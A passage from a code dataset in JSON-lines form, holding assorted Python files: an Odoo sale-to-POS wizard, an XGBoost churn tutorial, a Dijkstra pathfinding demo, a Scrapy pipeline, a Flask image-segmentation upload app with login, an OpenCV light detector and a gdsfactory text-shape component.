move_to_pos(self):\n sale_order = self.env['sale.order'].browse(self._context.get('sale_order_id'))\n if not sale_order:\n raise except_orm(_('Error'), _('Sale order not exists'))\n\n pos = self.__create_pos_order(sale_order)\n sale_order.state = 'moved_to_pos'\n return pos\n\n def __create_pos_order(self, sale_order):\n pos_session = self.env['pos.session'].browse(self.pos_session_id.id)\n\n lines = []\n for line in sale_order.order_line:\n lines.append((0, 0, {\n 'company_id': line.company_id.id,\n 'name': line.name,\n 'product_id': line.product_id.id,\n 'qty': line.product_uom_qty,\n 'discount': line.discount,\n 'price': line.price_unit,\n 'price_unit': line.price_unit,\n 'price_subtotal': line.price_subtotal,\n 'price_subtotal_incl': line.price_total\n }))\n\n if len(lines) < 1:\n raise except_orm('Cảnh báo', 'Đơn hàng chưa có sản phẩm,\\n'\n 'vui lòng cập nhật lại để có thể thực hiện tác vụ này.')\n\n pos_order_vals = {\n 'amount_tax': sale_order.amount_tax,\n 'amount_total': sale_order.amount_total,\n 'partner_id': sale_order.partner_id.id,\n 'date_order': sale_order.date_order,\n 'x_rank_id': sale_order.partner_id.x_rank_id.id,\n 'pricelist_id': sale_order.pricelist_id.id,\n 'user_id': pos_session.user_id.id,\n 'x_team_id': pos_session.user_id.sale_team_id.id,\n 'company_id': sale_order.company_id.id,\n 'session_id': pos_session.id,\n 'branch_id': sale_order.branch_id.id,\n 'pos_reference': sale_order.name,\n 'note': sale_order.note,\n 'sale_order_id': sale_order.id,\n 'lines': lines\n }\n\n pos = self.env['pos.order'].create(pos_order_vals)\n return pos\n\n def get_dialog(self):\n view_id = self.env.ref('izi_sale_order.sale_order_make_pos_order').id\n ctx = self._context.copy()\n ctx.update({\n 'izi_type': MessageDialogConfig.MessageDialogType.INFO,\n 'dialog_size': MessageDialogConfig.MessageDialogSize.MEDIUM\n })\n return {\n 'name': 'Choose session to create pos order',\n 'type': 'ir.actions.act_window',\n 'res_model': 'sale.order.make.pos.order',\n 'view_type': 'form',\n 'view_mode': 'form',\n 'views': [(view_id, 'form')],\n 'target': 'new',\n 'context': ctx,\n }\n","sub_path":"izi_sale_order/wizards/sale_order_make_pos_order.py","file_name":"sale_order_make_pos_order.py","file_ext":"py","file_size_in_byte":4297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"281274348","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Mar 18 20:33:13 2020\n\n@author: ramonpuga\n\"\"\"\n\n# XGBoost\n# Es muy potente para grandes conjuntos de datos (bigdata)\n\n# Las instrucciones de instalación se pueden consultar en http://xgboost.readthedocs.io/en/latest/build.html\n# Instalar en macOS Homebrew\n\n# Cómo importar las librerías\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\n# Importar el data set\ndataset = pd.read_csv('Churn_Modelling.csv')\n\nX = dataset.iloc[:, 3:13].values\ny = dataset.iloc[:, 13].values\n\n# Codificar datos categóricos\nfrom sklearn.preprocessing import LabelEncoder\nlabelencoder_X_1 = LabelEncoder()\nX[:, 1] = labelencoder_X_1.fit_transform(X[:, 1])\nlabelencoder_X_2 = LabelEncoder()\nX[:, 2] = labelencoder_X_2.fit_transform(X[:, 2])\n\n#El OneHotEncoder en las nuevas versiones está OBSOLETO\n#onehotencoder = OneHotEncoder(categorical_features=[1])\n#X = onehotencoder.fit_transform(X).toarray()\n\nfrom sklearn.preprocessing import OneHotEncoder\nfrom sklearn.compose import ColumnTransformer\n\ntransformer = ColumnTransformer(\n transformers=[\n (\"Churn_Modelling\", # Un nombre de la transformación\n OneHotEncoder(categories='auto'), # La clase a la que transformar\n [1] # Las columnas a transformar.\n )\n ], remainder='passthrough'\n)\n\nX = transformer.fit_transform(X)\n# Eliminar columna 0 para evitar la multicolinealidad\nX = X[:, 1:]\n\n# Dividir el data set en conjunto de entrenamiento y conjunto de testing\nfrom sklearn.model_selection import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state = 0)\n\n# Ajustar el modelo XGBoost al Conjunto de Entrenamiento\nfrom xgboost import XGBClassifier\nclassifier = XGBClassifier()\nclassifier.fit(X_train, y_train)\n\n# Predicción de los resultados con el Conjunto de Testing\ny_pred = classifier.predict(X_test)\n#y_pred = (y_pred > 0.5)\n\n# Elaborar una matriz de confusión\nfrom sklearn.metrics import confusion_matrix\ncm = confusion_matrix(y_test, y_pred)\n\n# Aplicar k-fold cross validation\nfrom sklearn.model_selection import cross_val_score\naccuracies = cross_val_score(estimator = classifier, X = X_train, y = y_train, cv = 10)\naccuracies.mean()\naccuracies.std()\n# Sale una media del 86% de precisión y la desviación estandar en torno al 1%\n# Precisión bastante elevada y con poca varianza \n\n\n","sub_path":"datasets/Part 10 - Model Selection & Boosting/Section 49 - XGBoost/my_xgboost.py","file_name":"my_xgboost.py","file_ext":"py","file_size_in_byte":2417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"630742188","text":"\"\"\"\r\nMatthew Sabo\r\nDijkstra\r\nCopywrite 2018\r\n\"\"\"\r\n\r\nfrom bfs import SquareGrid\r\nfrom Queue import PriorityQueue\r\nimport time\r\n\r\nclass WeightedGrid(SquareGrid):\r\n def __init__(self, width, height):\r\n super().__init__(width, height)\r\n self.weights = {}\r\n\r\n def cost(self, from_node, to_node):\r\n return self.weights.get(to_node, 1)\r\n\r\n def print(self):\r\n for y in range(self.height):\r\n for x in range(self.width):\r\n if ((x, y) in self.path): print(\"* \", end='')\r\n elif ((x, y) in self.walls): print(\"X \", end ='')\r\n else: print(\"%d \" % self.weights[(x, y)], end='')\r\n print(\"\\n\")\r\n\r\ndef dijkstra(grid, start, goal):\r\n frontier = PriorityQueue()\r\n frontier.put(start, 0)\r\n visited = {}\r\n cost_so_far = {}\r\n visited[start] = None\r\n cost_so_far[start] = 0\r\n\r\n while not frontier.empty():\r\n current = frontier.get()\r\n if current == goal: break\r\n for next in grid.neighbors(current):\r\n new_cost = cost_so_far[current] + grid.cost(current, next)\r\n if next not in cost_so_far or new_cost < cost_so_far[next]:\r\n cost_so_far[next] = new_cost\r\n priority = new_cost\r\n frontier.put(next, priority)\r\n visited[next] = current\r\n\r\n return visited, cost_so_far\r\n\r\ndef build_path(visited, start, goal):\r\n current = goal\r\n path = []\r\n while current != start:\r\n path.append(current)\r\n current = visited[current]\r\n path.append(start)\r\n path.reverse()\r\n return path\r\n\r\ngrid = WeightedGrid(15, 15)\r\ngrid.walls = [(7, 2), (7, 3), (7, 4), (7, 5), (7, 6), (7, 7), (7, 8), (7, 9)]\r\nfor x in range(15):\r\n for y in range(15):\r\n grid.weights[(x, y)] = 1\r\n\r\nfor x in range(6):\r\n for y in range(4):\r\n grid.weights[(x+1, y+10)] = 9\r\n\r\ngrid.print()\r\nprint(\"\\n\\n\")\r\n\r\nstart = time.time()\r\n(visited, costs) = dijkstra(grid, (1, 4), (14, 11))\r\nend = time.time()\r\nprint(\"Dijkstra time: %f\" %(end-start))\r\npath = build_path(visited, (1, 4), (14, 11))\r\ngrid.path = path\r\ngrid.print()","sub_path":"AILib/AILib/Pathfinding/dijkstra.py","file_name":"dijkstra.py","file_ext":"py","file_size_in_byte":2123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"158018528","text":"from math import sqrt\nfrom java.util import BitSet\nfrom java.util.stream import Collectors\n\n\ndef sieve(limit=100):\n primes = BitSet(limit + 1)\n primes.set(2, limit + 1)\n prime = 2\n while prime <= int(sqrt(limit)) + 1:\n for multiple in range(prime * prime, limit + 1, prime):\n primes.clear(multiple)\n prime = primes.nextSetBit(prime + 1)\n return primes.stream().boxed().collect(Collectors.toList())\n\n\nif __name__ == '__main__':\n print(sieve(10000000))\n","sub_path":"jython/src/sieve-bitset.py","file_name":"sieve-bitset.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"203306921","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://doc.scrapy.org/en/latest/topics/item-pipeline.html\nfrom pymongo import MongoClient\n\nclass CircPipeline(object):\n def process_item(self, item, spider):\n client = MongoClient()\n collection = client[\"test\"][\"chufa\"]\n time = item[\"time\"]\n title = item[\"title\"]\n print(\"时间:{} 标题:{}\".format(time, title))\n collection.insert(dict(item))\n return item\n","sub_path":"circ/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"610336980","text":"import numpy as np\r\nimport pandas as pd\r\n# df is your DataFrame\r\n\r\ndef get_PN(iid): # S_p와 S_n 구함\r\n x = df[df['iid']==str(iid)]\r\n #print(x.shape)\r\n if not x.shape[0]: #일치하는 iid가 없을 경우 0 return\r\n return 0\r\n P = []\r\n N = []\r\n U=25 # 총 유저수\r\n for i in range(0, x.shape[0]):\r\n tmp = x[i:i+1]\r\n if tmp['rating'].iloc[0] > 0.5 :\r\n P.append(tmp['uid'].iloc[0]) # P에 해당하는 인원 P에 추가\r\n else:\r\n N.append(tmp['uid'].iloc[0]) # N에 해당하는 인원 N에 추가\r\n S_p = 1-(len(P)/U) # P의 길이 = P 유저 수 \r\n S_n = 1-(len(N)/U) # N의 길이 = N 유저 수\r\n tmp = [[iid, S_p, S_n]]\r\n return tmp # iid와 iid의 S_p, S_n값을 담은 리스트 리턴\r\n\r\nS = pd.DataFrame(columns=[\"iid\", \"S_p\", \"S_n\"]) # get_PN 이용, iid별 S_p와 S_n를 구한다.\r\nfor i in range(0,150):\r\n result = get_PN(i)\r\n if result == 0: #반환값이 0 이면 데이터 프레임에 담지 않음\r\n continue\r\n tmp = pd.DataFrame(data=result, columns = [\"iid\", \"S_p\", \"S_n\"])\r\n S = S.append(tmp)\r\n \r\ndef Singularity(df):\r\n NumUsers = 25 #총 유저수\r\n sim = np.full((NumUsers,NumUsers), 0.0)\r\n for u in range(0,NumUsers):\r\n for v in range(u+1, NumUsers):\r\n u1 = df[df['uid']==str(u+1)] # uid가 일치하는 행들을 추출\r\n u2 = df[df['uid']==str(v+1)]\r\n\r\n inter = pd.merge(u1['iid'], u2['iid'], on='iid') # u1과 u2가 일치하는 iid를 추출(교집합)\r\n A=0\r\n B=0\r\n C=0\r\n A_val=0\r\n B_val=0\r\n C_val=0\r\n for i in range(len(inter)):\r\n iid = inter[i:i+1] #iid 교집합중 하나씩 추출\r\n iid = pd.to_numeric(iid.iid)\r\n iid = iid[i] #index로 먹기때문에 인덱스를 i로 맞춰주면댐\r\n S_p = S[S['iid']==iid]['S_p'].iloc[0]\r\n S_n = S[S['iid']==iid]['S_n'].iloc[0]\r\n #print(\"u= \",u,\"v= \",v,\"i= \",i)\r\n u1_rating = float(u1[u1['iid']==str(iid)]['rating'].iloc[0]) #각 레이팅 추출\r\n u2_rating = float(u2[u2['iid']==str(iid)]['rating'].iloc[0])\r\n tmp = u1_rating - u2_rating\r\n if u1_rating > 0 and u2_rating > 0:#공식에 맞게 설정\r\n A += 1\r\n A_val += (1-tmp*tmp)*S_p*S_p\r\n elif u1_rating <=0 and u2_rating <= 0:\r\n B += 1\r\n B_val += (1-tmp*tmp)*S_n*S_n\r\n elif (u1_rating > 0 and u2_rating <=0) or (u1_rating <= 0 and u2_rating >0):\r\n C +=1\r\n C_val += (1-tmp*tmp)*S_p*S_n\r\n\r\n if A==0 and B==0 and C==0: #각 A,B,C의 경우들 나열해 결과값 조정\r\n result = '0'\r\n elif A==0 and B==0:\r\n result = C_val/C\r\n elif B==0 and C==0:\r\n result = A_val/A\r\n elif A==0 and C==0:\r\n result = B_val/B\r\n elif A==0:\r\n result = (B_val/B + C_val/C)/2\r\n elif B==0:\r\n result = (A_val/A + C_val/C)/2\r\n elif C==0:\r\n result = (A_val/A + B_val/B)/2\r\n else:\r\n result = (A_val/A + B_val/B + C_val/C)/3\r\n sim[u,v] = result\r\n sim[v,u] = sim[u,v]\r\n return sim","sub_path":"singularity.py","file_name":"singularity.py","file_ext":"py","file_size_in_byte":3440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"590812623","text":"from django.shortcuts import render\nfrom . import forms\nfrom django.core.files.storage import FileSystemStorage\nfrom . import ocr_optifine\nfrom django.http import HttpResponse\nimport glob\nimport os\nfrom PIL import Image\nimport pytesseract\nimport argparse\nimport cv2\n\n# Create your views here.\ndef index(request):\n emptyMedia()\n return render(request,'firstapp/formpage.html')\n\ndef form_name_view(request):\n form =forms.FormName()\n emptyMedia()\n if(request.method=='POST'):\n form=forms.FormName(request.POST)\n uploaded_file=request.FILES['document']\n\n emptyMedia() #delete previous images\n fs = FileSystemStorage()\n fs.save(uploaded_file.name,uploaded_file)\n \n \n \n print(\"Image saved\")\n text=ocr_optifine.main()\n \n renameImage();\n \n if(text!='/0'):\n my_dict ={'text':text}\n return render(request,'firstapp/formpage.html',context=my_dict)\n\n\n return render(request, 'firstapp/formpage.html', {'form':form})\n\n\ndef emptyMedia():\n files = glob.glob('media/*')\n for f in files:\n os.remove(f)\n\ndef getImagePath():\n IMAGES_DIR=\".\\media\"\n # print(IMAGES_DIR)\n for fileName in os.listdir(IMAGES_DIR):\n print(\" \")\n im_dir=os.path.join(IMAGES_DIR, fileName)\n print(im_dir)\n return im_dir\n\ndef renameImage():\n os.rename(getImagePath(),\"media/img.png\")","sub_path":"formproject/firstapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"110733824","text":"from imutils import contours\nfrom skimage import measure\nimport numpy as np\nimport imutils\nimport cv2\n\n\nclass VisionManager():\n def __init__(self, path: str):\n self.image = cv2.imread(path)\n self.mask = None\n self.threshold = None\n self.gaussian = None\n self.gray = None\n self.gauss_x = 11\n self.gauss_y = 11\n self.thresh_x = 52\n self.thresh_y = 200\n\n def execute_detect(self):\n self.gray_filter()\n self.gaussian_filter(self.gauss_x, self.gauss_y)\n self.threshold_op(self.thresh_x, self.thresh_y)\n self.create_labels()\n self.get_circles_world()\n\n def save_image(self, output_path):\n cv2.imwrite(output_path, self.image)\n\n def create_labels(self):\n labels = measure.label(self.threshold,\n connectivity=1)\n self.mask = np.zeros(self.threshold.shape,\n dtype=\"uint8\")\n for label in np.unique(labels):\n if label == 0:\n continue\n\n label_mask = np.zeros(self.threshold.shape, dtype=\"uint8\")\n label_mask[labels == label] = 255\n num_pixels = cv2.countNonZero(label_mask)\n if num_pixels > 300:\n self.mask = cv2.add(self.mask, label_mask)\n\n def gray_filter(self):\n self.gray = cv2.cvtColor(self.image, cv2.COLOR_BGR2GRAY)\n\n def gaussian_filter(self, x, y):\n self.gaussian = cv2.GaussianBlur(self.gray, (x, y), 0)\n\n def threshold_op(self, x, y):\n image_1 = cv2.threshold(self.gaussian, x, y, cv2.THRESH_BINARY)[1]\n self.threshold = cv2.dilate(cv2.erode(image_1, None, iterations=1),\n None, iterations=8)\n\n def find_lights_world(self):\n return contours.sort_contours(imutils.grab_contours(\n cv2.findContours(self.mask.copy(),\n cv2.RETR_EXTERNAL,\n cv2.CHAIN_APPROX_SIMPLE)))[0]\n\n def get_circles_world(self):\n color = (255, 230, 0)\n for k in self.find_lights_world():\n (ki, li), radius = cv2.minEnclosingCircle(k)\n cv2.circle(self.image, (int(ki), int(li)),\n int(radius), color, 1)\n\n\nif __name__ == \"__main__\":\n image_list = [\"data/region1.png\",\n \"data/region2.png\",\n \"data/region3.png\",\n \"data/region4.png\",\n \"data/region5.png\",\n \"data/region6.png\"]\n for index, image in enumerate(image_list):\n\n analytics = VisionManager(image)\n analytics.execute_detect()\n analytics.save_image(f\"data/output_{index}.jpg\")","sub_path":"nasa_proj2/visual_computing_map/population_industry_detect/dlights.py","file_name":"dlights.py","file_ext":"py","file_size_in_byte":2691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"636545379","text":"from typing import Tuple\n\nimport numpy as np\nfrom phidl.geometry import _glyph, _indent, _width\n\nimport gdsfactory as gf\nfrom gdsfactory.component import Component\nfrom gdsfactory.components.text_rectangular import text_rectangular\nfrom gdsfactory.name import clean_name\nfrom gdsfactory.tech import LAYER\nfrom gdsfactory.types import Coordinate, Layer\n\n\n@gf.cell\ndef text(\n text: str = \"abcd\",\n size: float = 10.0,\n position: Coordinate = (0, 0),\n justify: str = \"left\",\n layer: Tuple[int, int] = LAYER.TEXT,\n) -> Component:\n \"\"\"Text shapes.\n\n Args:\n text:\n size:\n position:\n justify: left, right, center\n layer:\n\n \"\"\"\n scaling = size / 1000\n xoffset = position[0]\n yoffset = position[1]\n t = gf.Component(f\"{clean_name(text)}_{int(position[0])}_{int(position[1])}\")\n\n for i, line in enumerate(text.split(\"\\n\")):\n label = gf.Component(f\"{t.name}_{i}\")\n for c in line:\n ascii_val = ord(c)\n if c == \" \":\n xoffset += 500 * scaling\n elif 33 <= ascii_val <= 126:\n for poly in _glyph[ascii_val]:\n xpts = np.array(poly)[:, 0] * scaling\n ypts = np.array(poly)[:, 1] * scaling\n label.add_polygon([xpts + xoffset, ypts + yoffset], layer=layer)\n xoffset += (_width[ascii_val] + _indent[ascii_val]) * scaling\n else:\n ValueError(f\"[PHIDL] text(): No character with ascii value {ascii_val}\")\n ref = t.add_ref(label)\n t.absorb(ref)\n yoffset -= 1500 * scaling\n xoffset = position[0]\n justify = justify.lower()\n for label in t.references:\n if justify == \"left\":\n pass\n elif justify == \"right\":\n label.xmax = position[0]\n elif justify == \"center\":\n label.move(origin=label.center, destination=position, axis=\"x\")\n else:\n raise ValueError(f\"justify = {justify} not in ('center', 'right', 'left')\")\n return t\n\n\n@gf.cell\ndef githash(\n text: Tuple[str, ...] = (\"\",),\n size: float = 0.4,\n hash_length: int = 6,\n layer: Layer = LAYER.WG,\n) -> Component:\n \"\"\"Returns the repo git hash\n allows a list of text, that will print on separate lines\n\n Args:\n text:\n size:\n hash_length:\n layer:\n\n \"\"\"\n try:\n\n git_hash = gf.CONFIG[\"repo\"][:hash_length]\n git_hash = f\"gf_{git_hash}\"\n except Exception:\n git_hash = f\"gf_{gf.__version__}\"\n\n c = gf.Component()\n t = text_rectangular(text=git_hash, size=size, layer=layer)\n tref = c.add_ref(t)\n c.absorb(tref)\n\n for i, texti in enumerate(text):\n t = text_rectangular(text=texti, size=size, layer=layer)\n tref = c.add_ref(t)\n tref.movey(-6 * size * (i + 1))\n c.absorb(tref)\n return c\n\n\nif __name__ == \"__main__\":\n c = text(\n text=\".[,ABCDEFGHIKKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789:/\",\n size=4.0,\n justify=\"right\",\n position=(120.5, 3),\n )\n # c = githash(text=[\"a\", \"b\"], size=10)\n c.show()\n","sub_path":"gdsfactory/components/text.py","file_name":"text.py","file_ext":"py","file_size_in_byte":3139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"392612324","text":"from menu import menu\nfrom escrita import escrita\nfrom leitura import leitura\nimport cores\nfrom leitura import extremos\nfrom escrita import apagar_arquivo\nfrom menu import leia_int\nfrom pesquisa import pesquisa\n\n\ndef exibição():\n corL=cores.cores_letra('azul')\n introdução=(f'---------PESSOAS CADASTRADAS--------\\nNOME{\"IDADE\":>32}')\n introdução=cores.pintura(C_L=corL, msg=introdução)\n print(introdução)\n leitura()\n print(cores.pintura(C_L=corL, msg='------FIM DA LEITURA DO ARQUIVO-----'))\n\n\n\nwhile True:\n menu()\n escolha=leia_int('ESCOLHA: ')\n if escolha == 1:\n escrita()\n elif escolha == 2:\n exibição()\n elif escolha == 4:\n extremos('maior')\n elif escolha == 6:\n apagar_arquivo()\n elif escolha == 5:\n extremos('menor')\n elif escolha == 7:\n resposta = pesquisa(str(input('Nome desejado: ')).lower().capitalize())\n print(resposta)\n else:\n corL=cores.cores_letra('vermelho')\n fim=(f'{\" \"*10}FIM DO PROGRAMA')\n fim= cores.pintura(C_L=corL, msg=fim)\n print(fim)\n break","sub_path":"Modulação Exercicio/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"379171700","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@author: nermin.bibic\n\"\"\"\n\nimport json\n\ndef extract_jsons(string, load=True):\n \"\"\"Extracts all valid JSON objects from within the given string.\"\"\"\n string = string.strip()\n li = []\n s = ''\n i = 0\n j = 0\n for c in string:\n if c == '{':\n i += 1\n s += c\n elif c == '}':\n j += 1\n s += c\n else:\n if i > 0:\n s += c\n if i > 0 and i == j:\n o = json.loads(s)\n if load:\n li.append(o)\n else:\n li.append(s)\n s = ''\n i = 0\n j = 0\n return li\n\ndef del_none(d):\n \"\"\"Deletes all the key-value pairs from the dictionary where the value is\n None, recursively and in-place.\"\"\"\n for key, value in list(d.items()):\n if value is None:\n del d[key]\n elif isinstance(value, dict):\n del_none(value)\n return d\n\ndef del_empty_dicts(d):\n \"\"\"Deletes all the key-value pairs from the dictionary where the value is\n an empty dictionary, recursively and in-place.\"\"\"\n for key, value in list(d.items()):\n if value == {}:\n del d[key]\n elif isinstance(value, dict):\n del_empty_dicts(value)\n return d\n","sub_path":"Projects/json_parsing/json_functions.py","file_name":"json_functions.py","file_ext":"py","file_size_in_byte":1305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"199532600","text":"import nltk\nfrom nltk.corpus import conll2000\nclass UnigramChunker(nltk.ChunkParserI):\n def __init__(self, train_sents):\n train_data = [[(t,c) for w,t,c in nltk.chunk.tree2conlltags(sent)]\n for sent in train_sents]\n self.tagger = nltk.UnigramTagger(train_data)\n\n def parse(self, sentence):\n ## get the word's tag\n pos_tags = [pos for (word,pos) in sentence]\n ## tag the chunk\n tagged_pos_tags = self.tagger.tag(pos_tags)\n ## get the chunktagged list\n chunktags = [chunktag for (pos, chunktag) in tagged_pos_tags]\n ## get the list\n conlltags = [(word, pos, chunktag) for ((word,pos),chunktag)\n in zip(sentence, chunktags)]\n ## return the chunktagged data use conlltagstree struction\n return nltk.chunk.conlltags2tree(conlltags)\n\ntest_sents = conll2000.chunked_sents('test.txt', chunk_types=['NP'])\ntrain_sents = conll2000.chunked_sents('train.txt', chunk_types=['NP'])\nunigram_chunker = UnigramChunker(train_sents)\nprint(unigram_chunker.evaluate(test_sents))\n\n\n","sub_path":"Chapter7/completeChunking.py","file_name":"completeChunking.py","file_ext":"py","file_size_in_byte":1113,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"123244734","text":"from flask import Flask, render_template, flash, redirect, url_for, request, send_file, make_response\nfrom app import app\nfrom modules.__init__ import db, login_manager\nfrom modules.models.forms import LoginForm, RegisterForm\nfrom modules.models.tables import User, CallLogs\nfrom flask_login import login_user, logout_user, current_user\nfrom werkzeug.security import generate_password_hash, check_password_hash\nimport predict\nimport os\nfrom werkzeug.exceptions import BadRequest\nfrom werkzeug.utils import secure_filename\n\nALLOWED_EXTENSIONS = set(['jpg', 'jpeg'])\n\n@app.route('/', methods=['GET'])\ndef index():\n\treturn render_template('serving_template.html')\n@app.route('/image', methods=[\"POST\"])\ndef predict_plants_web():\n\t\"\"\"\n\tTake the input image and style transfer it\n\t\"\"\"\n\t# check if the post request has the file part\n\tinput_file = request.files.get('file')\n\tif not input_file:\n\t\tprint(\"File not present\")\n\t\treturn BadRequest(\"File not present in request\")\n\n\tfilename = secure_filename(input_file.filename)\n\tif filename == '':\n\t\tprint(\"File name is not present\")\n\t\treturn BadRequest(\"File name is not present in request\")\n\tif not allowed_file(filename):\n\t\tprint(\"Invalid type\")\n\t\treturn BadRequest(\"Invalid file type\")\n\n\tif not os.path.exists(\"inputs/\"):\n\t\tprint(\"os.mkdir('inputs/')\")\n\t\tos.mkdir(\"inputs/\")\n\n\tinput_filepath = os.path.join(\"inputs/\", filename)\n\tprint(input_filepath)\n\tinput_file.save(input_filepath)\n\n\tif not os.path.exists(\"outputs/\"):\n\t\tos.mkdir(\"outputs/\")\n\toutput_filepath = os.path.join(\"outputs/\", 'msk_' + filename)\n\timg_str = predict.get_plants(input_filepath, output_filepath)\n\n\tresponse = make_response(img_str)\n\tresponse.headers.set('Content-Type', 'image/jpeg')\n\tnew_log = CallLogs(input_filepath, output_filepath, current_user.get_id())\n\tdb.session.add(new_log)\n\tdb.session.commit()\n\treturn response\n\ndef allowed_file(filename):\n\treturn '.' in filename and \\\n\t\tfilename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS\n\n\n@login_manager.user_loader\ndef load_user(id):\n\treturn User.query.filter_by(id=id).first()\n\t#return User.get_id(User.query.filter_by(id=id).first())\n@app.route(\"/login\", methods=[\"GET\", \"POST\"])\ndef login():\n form = LoginForm()\n if form.validate_on_submit():\n user = User.query.filter_by(username=form.username.data).first()\n if user and check_password_hash(user.password, form.password.data):\n login_user(user, remember=form.remember_me.data)\n flash(\"Logado com sucesso!\")\n if user.username == 'adm':\n return redirect(url_for(\"cadastro\"))\n else:\n return redirect(url_for(\"index\"))\n else:\n flash(\"Login inválido!\")\n return render_template('login.html', form=form)\n@app.route(\"/logout\")\ndef logout():\n logout_user()\n flash(\"Até mais!\")\n return redirect(url_for(\"index\"))\n\n@app.route(\"/cadastro\", methods=[\"GET\", \"POST\"])\ndef cadastro():\n form = RegisterForm()\n if form.validate_on_submit():\n username = form.username.data\n password = generate_password_hash(form.password.data)\n name = form.name.data\n email = form.email.data\n try:\n new_user = User(username, password, name, email)\n db.session.add(new_user)\n db.session.commit()\n return redirect(url_for('login'))\n except:\n flash('Ocorreu um erro, verifique os dados e tente novamente.')\n return render_template('cadastro.html', form=form)\n\n@app.route(\"/home\")\ndef home():\n\treturn render_template(\"index.html\")\n\n@app.route(\"/log\")\ndef log():\n\treturn render_template(\"log.html\")","sub_path":"modules/controllers/default.py","file_name":"default.py","file_ext":"py","file_size_in_byte":3615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"547998359","text":"\n# # *运算符 打印三角形\n# for i in range(1, 6):\n# print(\"*\"*i)\n\n# print(max([1, 3, 4, 6, 5]))\n# print(max(\"abcdef\"))\n\n\n# del\n# 列表: del 列表名[下标索引]\n# 字典: del 字典名[key]\n\n# 删除变量 了解(后期讲解)\n\n# 多维列表/元祖访问的示例\n\nmy_list = [1, 3, 5, (2, 3, 5, {\"name\": \"小明\", \"test\": [\"你好\", \"终于等到你\"]}, 2)]\n\n# 终于等到你\nret1 = my_list[3]\n# (2, 3, 5, {'name': '小明', 'test': ['你好', '终于等到你']}, 2)\n# print(ret1)\nret2 = ret1[3]\n# {'name': '小明', 'test': ['你好', '终于等到你']}\n# print(ret2)\nret3 = ret2[\"test\"]\n# ['你好', '终于等到你']\n# print(ret3)\nret4 = ret3[1]\nprint(ret4)\n\n#\nret = my_list[3][3][\"test\"][1]\nprint(ret)\n","sub_path":"pythonstage1/day06/04-公共方法.py","file_name":"04-公共方法.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"225066375","text":"#!/usr/bin/env python3\n\n# EPITECH PROJECT, 2017\n# 104intersection.py\n# File description:\n# main file for 104intersection\n\nimport sys\nimport math\nfrom calculate_delta import *\n\ndef verify_errors(argv):\n\tif len(argv) != 9:\n\t\texit(84)\n\tif int(argv[1]) < 1 or 3 < int(argv[1]):\n\t\texit(84)\n\tif int(argv[8]) % 90 == 0 and int(argv[1]) == 3:\n\t\texit(84)\n\tif int(argv[8]) == 0 and (int(argv[1]) == 1 or int(argv[1] == 2)):\n\t\texit(84)\n\ndef print_line(argv):\n\tprint(\"straight line going through the (\", argv[2], \",\", argv[3], \",\",\n\targv[4], \") point and of direction vector (\", argv[5], \",\", argv[6], \",\",\n\targv[7], \")\", sep='')\n\ndef main_insertion(argv):\n\tif int(argv[1]) == 1:\n\t\tprint(\"sphere of radius\", argv[8])\n\t\tprint_line(argv)\n\t\tcalculate_delta_sphere(argv)\n\telif int(argv[1]) == 2:\n\t\tprint(\"cylinder of radius\", argv[8])\n\t\tprint_line(argv)\n\t\tcalculate_delta_cylinder(argv)\n\telif int(argv[1]) == 3:\n\t\tprint(\"cone of\", argv[8], \"degree angle\")\n\t\tprint_line(argv)\n\t\tcalculate_delta_cone(argv)\n\ndef main(argv):\n\tverify_errors(argv)\n\tmain_insertion(argv)\n\n\nif __name__ == '__main__':\n main(sys.argv)\n","sub_path":"104intersection_2017/104intersection.py","file_name":"104intersection.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"383290745","text":"import difflib\ndef my_sol_check(exo, exp):\n with open(exo, 'r') as the_in:\n with open(exp, \"r\") as the_out:\n \tl = the_in.readline().splitlines()\n \tr = the_out.readline().splitlines()\n \tdiff = difflib.Differ().compare(r,l)\n \tprint(' '.join(diff))\n\n\n \t\t\nmy_sol_check(\"test\", \"tested\")\n","sub_path":"challenges/compare_the_triplets/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"632573183","text":"import django\nimport sys\nimport os\nimport json\nfrom datetime import datetime\n\nfrom pandas.io.json 